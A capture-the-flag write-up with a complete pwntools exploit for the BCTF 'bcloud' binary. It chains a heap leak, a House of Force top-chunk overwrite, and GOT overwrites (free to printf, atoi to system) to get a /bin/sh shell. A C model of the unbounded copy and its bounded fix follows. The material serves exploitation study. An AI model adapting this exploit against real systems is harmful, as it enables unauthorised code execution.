cdor1's lab
BCTF bcloud
Postscript: I tried to exploit it with HOF, overwriting the GOT through the content that is managed as an array, but it did not work well, so I plan to come back to it later... ㅠㅠ
from pwn import *

s = remote('localhost', 4000)
elf = ELF('/home/cdor1/pwnable/bcloud')
libc = ELF('/home/cdor1/pwnable/libc.so.6_cdor1')

# GOT/PLT addresses from the binary, plus the system-atoi distance in the given libc
atoi = elf.got['atoi']
free = elf.got['free']
printf = elf.plt['printf']
bss = elf.bss()
offset = libc.symbols['system'] - libc.symbols['atoi']

# Fill the 64-byte name buffer completely; the unterminated name is echoed back
# together with the heap pointer stored after it, which leaks heap_base
print s.recvuntil('Input your name:')
s.sendline('A'*60 + 'B'*4)
s.recvuntil('BBBB')
heap_base = u32(s.recv(4))
topch = heap_base + 0xd8          # address of the top chunk

# Org/Host: the 64-byte Org fills its buffer, and Host overwrites the top chunk
# size field with 0xffffffff (House of Force)
print s.recvuntil('Org:')
s.sendline('A'*64)
print s.recvuntil('Host:')
s.sendline('\xff\xff\xff\xff')

# Note 0: request a size that moves the top chunk right in front of .bss
print s.recvuntil('option--->>')
s.sendline('1')
print s.recvuntil('Input the length of the note content:')
vuln_size = (bss - topch) - 0x08
s.sendline(str(vuln_size))

# The next note lands on .bss: overwrite the note size table and the note
# pointer array so that notes 0..2 point at GOT entries
payload = p32(4)          # size of note 0
payload += p32(4)         # size of note 1
payload += p32(4)         # size of note 2
payload += p32(0) * 29    # padding up to the pointer array
payload += p32(atoi)      # note 0 -> atoi@got
payload += p32(free)      # note 1 -> free@got
payload += p32(atoi)      # note 2 -> atoi@got
payload += p32(0) * 8
print s.recvuntil('option--->>')
s.sendline('1')
print s.recvuntil('Input the length of the note content:')
s.sendline(str(len(payload)))   # the length has to be sent as text, not an int
print s.recvuntil('Input the content:')
s.sendline(payload)

# Edit note 1: free@got <- printf@plt, so the delete option calls printf
print s.recvuntil('option--->>')
s.sendline('3')
print s.recvuntil('Input the id:')
s.sendline('1')
print s.recvuntil('Input the new content:')
s.sendline(p32(printf))

# Delete note 0: printf(atoi@got) prints the libc address of atoi
print s.recvuntil('option--->>')
s.sendline('4')
print s.recvuntil('Input the id:')
s.sendline('0')
libc_atoi = u32(s.recv(4))
libc_system = libc_atoi + offset

# Edit note 2: atoi@got <- system
print s.recvuntil('option--->>')
s.sendline('3')
print s.recvuntil('Input the id:')
s.sendline('2')
print s.recvuntil('Input the new content:')
s.sendline(p32(libc_system))

# The menu parses the option with atoi, which now resolves to system
print s.recvuntil('option--->>')
s.sendline('/bin/sh\x00')
s.interactive()
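The overflow the script above depends on (a 64-byte Org/Host input whose tail lands in the size word of the following top chunk, which the exploit sets to 0xffffffff) is a plain unbounded copy. The constructed C model below is an added example, not code from this post or from the challenge binary: it places a 64-byte buffer directly in front of a 4-byte size word, shows the unchecked copy clobbering that word, and shows the bounded, NUL-terminating copy that keeps it intact and reports truncation to the caller. All names (copy_unchecked, copy_bounded, size_word_intact, bounded_reports_truncation, SANE_SIZE) are assumptions made for the illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed model, not the challenge binary: a 64-byte input buffer
 * followed directly by a 4-byte size word, the way a chunk's user data is
 * followed by the next (here: top) chunk's size field in the glibc heap. */
#define BUF_LEN 64
#define REGION_LEN (BUF_LEN + 4)
#define SANE_SIZE 0x21u   /* constructed: a plausible small chunk size word */

/* Reads the size word that sits right after the buffer. */
uint32_t read_next_size(const unsigned char *region) {
    uint32_t v;
    memcpy(&v, region + BUF_LEN, sizeof v);
    return v;
}

/* Vulnerable pattern: the caller's byte count is trusted, so n > BUF_LEN
 * writes straight through into the size word that follows the buffer. */
void copy_unchecked(unsigned char *region, const char *src, size_t n) {
    memcpy(region, src, n);        /* no comparison against BUF_LEN */
}

/* Hardened form: the copy is capped at BUF_LEN-1, the buffer is always
 * NUL-terminated inside its own bounds, and the caller learns whether the
 * input was cut so it can reject over-long input instead of silently
 * keeping a truncated copy. Returns 1 on truncation, 0 otherwise. */
int copy_bounded(unsigned char *region, const char *src, size_t n) {
    size_t lim = BUF_LEN - 1;
    int truncated = n > lim;
    size_t k = truncated ? lim : n;
    memcpy(region, src, k);
    region[k] = '\0';
    return truncated;
}

/* Runs one copy of n 'A' bytes (n capped at REGION_LEN) through either
 * routine and reports whether the adjacent size word survived:
 * 1 = intact, 0 = clobbered. */
int size_word_intact(int use_bounded, size_t n) {
    unsigned char region[REGION_LEN];
    char src[REGION_LEN];
    uint32_t sane = SANE_SIZE;

    if (n > REGION_LEN) n = REGION_LEN;
    memset(src, 'A', sizeof src);
    memset(region, 0, sizeof region);
    memcpy(region + BUF_LEN, &sane, sizeof sane);

    if (use_bounded)
        copy_bounded(region, src, n);
    else
        copy_unchecked(region, src, n);

    return read_next_size(region) == SANE_SIZE;
}

/* Exposes the truncation report of copy_bounded for an input of n bytes. */
int bounded_reports_truncation(size_t n) {
    unsigned char region[REGION_LEN];
    char src[REGION_LEN];
    if (n > REGION_LEN) n = REGION_LEN;
    memset(src, 'A', sizeof src);
    return copy_bounded(region, src, n);
}
```

The bounded routine treats "input longer than the buffer" as an error to surface rather than a condition to paper over, which is what removes the write into the neighbouring chunk header in the first place. Independently of the application fix, glibc 2.29 and later abort with "malloc(): corrupted top size" when the top chunk's size exceeds the arena's system_mem, so the 0xffffffff top size this exploit relies on is rejected by a current allocator.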